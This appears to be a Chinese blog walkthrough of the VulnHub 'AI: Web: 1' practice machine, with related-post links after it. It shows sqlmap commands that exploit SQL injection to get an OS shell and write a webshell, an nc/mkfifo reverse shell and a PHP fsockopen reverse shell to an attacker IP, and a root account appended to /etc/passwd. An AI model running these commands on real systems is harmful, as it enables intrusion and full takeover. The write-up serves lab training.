Vulnhub_WEB1靶机渗透测试

最新推荐文章于 2024-05-20 21:17:42 发布
最新推荐文章于 2024-05-20 21:17:42 发布
阅读量84 收藏
点赞数 1
分类专栏: Vulnhub渗透测试靶场 文章标签: 网络 linux 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66225311/article/details/133072842
版权

WEB:1

AI: Web: 1 ~ VulnHub

该框旨在测试渗透测试人员的技能。目标很简单。从 /root/flag.txt 获取标志。 枚举框,获取低特权 shell,然后将权限升级到根

文章目录

信息收集

  1. 使用nmap对网段和目标主机进行扫描 nmap -sT -sV -O 192.168.78.152

web渗透

  1. 发现目标主机只开放了80端口,只有网站可以进行渗透,而且存在robots.txt文件,对其进行访问
  2. 发现两个目录都被禁止访问了,可能都缺少权限吧
  3. 再使用dirb对se3re目录进行扫描,发现了存在index.php文件,访问该目录发现了提交框

image-20230620224700375

  1. 提交1发现似乎是存在SQL注入漏洞,对其变量类型进行测试发现是字符型注入

    image-20230620225055942

    image-20230620224942536

image-20230620224856535

  1. 接下来就直接使用sqlmap对SQL注入进行利用了,测试了一下没有过滤命令,抓包将数据包保存为web1.txt,毕竟是post参数。post的值写入到–data中

image-20230620225115545

image-20230620225122269

  1. 发现sqlmap可以成功跑下来,对数据库内容进行查看没有发现什么有用信息,毕竟没有登录的界面,也没有开放ssh。但是想到联合注入是可以进行写shell的。直接使用payload获取shellpython sqlmap.py -r test/web1.txt --data "uid=" -level 3 --os-shell 获取shell的level等级必须大于3

image-20230620225340715

  1. 填写一些主要的参数,shell的语言类型,2,上传的路径地址三个条件

image-20230620225533915

  1. 返回了shell框,输入id发现成功获取了shell

image-20230620225638550

  1. 访问产生的shell文件地址,发现是一个提交框,可以上传自己本地的木马,那就不客气了,进行文件上传 这是sqlmap生成的文件提交框

image-20230620225719836

  1. 使用蚁剑连接该目录,成功获取了权限

image-20230620225818865

  1. 另外还可以直接写shell文件到目标主机的目录中payload为 python sqlmap.py -u "http://192.168.78.152/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write "E:\Web\oneword.php" --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php

image-20230620225910922

image-20230620225916615

  1. 使用蚁剑测试链接效果
image-20230621144248248

获取shell

  1. 打开蚁剑的虚拟终端,将shell反弹到虚拟机上

  2. 挣扎了半天能使用的都尝试了,失败告终 rm /tmp/f;mkfifo/tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.78.145 7878 >/tmp/f

  3. 最终使用php代码执行获取了shell权限

<?php
$sock=fsockopen("192.168.78.145",7878);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

image-20230621151408277

image-20230621151402893

image-20230621151324286

权限提升

  1. 没什么思路,没有ssh服务,所以不会有ssh登录的可能,find查找suid提权也没有,sudo -l也没信息
  2. 通过了解得知类似于DC-9靶机的对/etc/passwd写入账号密码来进行提权。查看一下passwd的权限,发现竟然是web权限就可以编译。那看来就是创建root账号密码了

image-20230621153129773

  1. 查看了一下suoders的权限,发现只能是root用户,所以不能直接写入用户名和权限了

image-20230621153348658

  1. 用openssl生成用户,用户名为hacker密码123456 openssl passwd -1 -salt hacker 123456 $1$hacker$6luIRwdGpBvXdP.GMwcZp/

image-20230621154740941

  1. 现在就要了解一下passwd文件下保存的账号密码的格式了
用户名:密码:UID(用户ID):GID(组ID):描述性信息:主目录:默认Shell hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash

  1. 使用echo 格式 >> /etc/passwd文件中。 命令为echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash' >> /etc/passwd

  2. 查看passwd写入的账号密码信息

image-20230621154913966

  1. 切换到hacker用户 su - hacker

image-20230621154951300

  1. 来到root目录下查看flag文件

image-20230621155009055

总结

  1. 了解了使用sqlmap获取shell和上传shell的操作 需要联合注入的条件下
  2. 扫描出来的目录都没有权限查看,一定还有隐藏的目录可以查看,可以尝试回退一级来查看,或者使用dirb再来对每个能访问的目录进行扫描
  3. 反弹shell的方式很多,nc bash不行,可以直接执行php或者python代码写的反弹shell文件
  4. 没有ssh连接,也没有suid提权,可以去看看sudo -l 和 /etc/passwd,/etc/sudoers文件的权限,查看是否可以写入来获取root权限
生而逢时
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub_Ganana靶机渗透测试
m0_66225311的博客
09-23 217
靶机开始前和开始后真属实是一波三折,头都大了靶机的渗透更是一波三折,确实够难够复杂,目录扫描得到了很多的目录,其实发现每一个都没多少用处,只有secret比较关键端口扫描得到的6777ftp服务是可以进行匿名登录的,但是登录后发现只有一条欢迎语,可以说是噩梦开始的地方了破局的关键是使用dirb扫描得到tasks目录,里面提示到了用户名(文件名)和藏着账户密码的。
Vulnhub_driftingblues1靶机渗透测试
m0_66225311的博客
10-06 110
本次靶机进行了域名渗透操作,进行了子域名爆破,提权时隐藏了定时任务的信息根据网页提示说和host文件有关系,接触到host就要想到ip和域名对应,既然涉及到域名那就少不了子域名爆破了,信息就隐藏在子域名网页中。还要讲子域名添加到hosts文件中。子域名爆破的工具有很多,这里使用的是layer和ffuf再进行后渗透时,发现存在脚本需要使用root权限执行即可进行权限提升的利用,那多半就可能是定时任务来执行的,本次靶机就将定时任务的信息隐藏了,但是可以使用pspy64工具查看得知存在定时任务。
Vulnhub_Grotesque3靶机渗透测试
m0_66225311的博客
09-18 156
靶机难度挺高,主要是真想不到地图上这提示是需要md5加密在进行目录扫描的学习到了将字典文件转换成md5加密后的文件如果文件包含不能查看到一些有用的文件,就只好对密码文件中的用户进行暴力破解了sudo suid 计划任务 内核提权 不安全的服务 文件 遗留密码 可写权限文件都不能进行提权,可以使用pspy64文件查看系统所执行的进程,可能会发现隐藏的定时任务对外没有开放smb服务,可以使用靶机的shell通过smb客户端进行连接smb目录没有权限写入,就使用smb客户端进行连接挂载好的smb。
vulnhub_driftingblues7靶机渗透测试
m0_66225311的博客
10-09 822
本次靶机的网站用户竟然是root用户的,获取shell直接就是root权限没有找到对应cms框架的版本,还是很难进行漏洞利用的,但改框架就一个漏洞利用exp目录扫描是前期的重中之重在没有获得shell,最好先尝试MSF进行漏洞攻击。
Vulnhub_DriftingBlues2靶机渗透测试
m0_66225311的博客
09-08 64
Vulnhub_DriftingBlues2靶机渗透测试
Vulnhub_Corrosion2靶机渗透测试
m0_66225311的博客
09-17 137
靶机难度感觉不算大,查看好靶机给的提示,枚举是关键,在爆破压缩包,爆破randy用户密码的时候都有用到新版本的框架,多半已经修复了之前的漏洞,登陆到后台后先查看一下版本信息,搜索一下当前版本是否有漏洞收集好发现的的账号密码,一些提示性的界面,都会有所帮助本次提权使用到的是polkit提权,执行命令调用helper来执行/bin/bash获得root权限。
Vulnhub_Grotesque 1.0.1靶机渗透测试
m0_66225311的博客
09-19 121
查看网站上醒目的标识,可能会有不小的收获有着很多相同文件内容的文件夹,要怀疑其中就有隐藏内容的文件,按照占内存大小排序,可能会发现第一个文件中隐藏着某些信息这个把歌词转换成md5值的操作可以说很脑洞了md5sum,应该是要和注释的图片联系起来,毕竟人名一样wordpress后台getshellcms框架的网站,配置文件中会有着数据库的账号和密码,可能也是本机的用户加深了对于.kdbx文件的解密和查看。
Vulnhub_Midwest 1.0.1靶机渗透测试
m0_66225311的博客
09-21 190
本次靶机的难度还挺大的,隐藏的信息和不懂得知识还是有点多的。因为没有接触过nagios监控系统,所以扫描出来了该目录也没太过于关注,没想到后台密码的突破点和提权的突破点都在nagios上了nagios的默认账户为,爆破得到PowerPower密码,结合界面的Power组成后台密码的隐藏信息,所有密码就是围绕Power的确定密码是围绕某个特定单词组成的,可以使用命令指定相关规则,对某得特定的单词生成相关密码本wordpress后台getshell。
Vulnhub_WestWild1.1靶机渗透测试
m0_66225311的博客
09-20 101
该靶场主要学习到了就是使用Samba查看共享文件,使用sabmap和sabclient对samba服务的利用。没想到的一点就是用户横向移动查找另一个用户账号密码文件的方式,直接查找了当前用户可写权限的·文件,找到了存储账号密码的一个脚本。该用户具有root的全部权限 直接sudo /bin/bash获取root的shell。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Linux网络编程:网络基础
weixin_73234157的博客
05-20 482
当我们形成计算机网络后,小明要给他的暗恋对象小红发一句“我喜欢你”,结果发给了小芳……,在计算机网络中会出现许许多多的主机,当我们进行网络通信时,我们要通过协议来找到指定的接收方。同理在单台主机中,数据从键盘中读入再转载到当前网卡也是需要协议的。简单来说:协议就是一种约定当计算机在读取数据时,发现数据中存在向网卡输送的标志(协议)时,就往网卡输送。当网卡读取到输送给小红,网卡就不会发送给小芳。
PyBullet 物理引擎
最新发布
FL1717的博客
05-20 488
软件安装pip install pybulletPyBullet的默认搜索路径:F:\Software_Setup\Python\Python_Setup\Lib\site-packages\pybullet_data Python的第三方库会安装到解释器目录的下的Lib的site-packages文件夹,里面有5个…由于其使用免费的Bullet引擎,安装过程相对简单,且文档全面,每个API都提供了详细的示例,使得PyBullet成为开发人员的有力工具。
netstat协议
lovemelovefish的博客
05-15 378
本机各端口的网络连接情况。
气泡水位计的简介与工作原理(一)
sym_robot的博客
05-18 238
本文介绍了气泡式水位计工作原理,符合GB/T 11828.2-2022新国标 二级精度,水利部认证。大容量存储,液晶显示屏幕。 本产品主要适用于我国水质水情,特别适用于中小水库水位测量、河道河流水位测量,发电厂调压井水位,海洋、地下水水位的测量,化工、煤矿、污水处理、自来水厂等处的水位及液位的监测,适用于不便建测井或建井昂贵的场合。
metasploit靶机渗透测试
08-02
Metasploit靶机是一个用于渗透测试和漏洞利用的虚拟机。您可以通过在VMware虚拟机中安装Metasploitable来搭建一个用于练习渗透攻击的环境。首先,您需要下载Metasploitable虚拟机镜像文件,可以在SourceForge网站上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值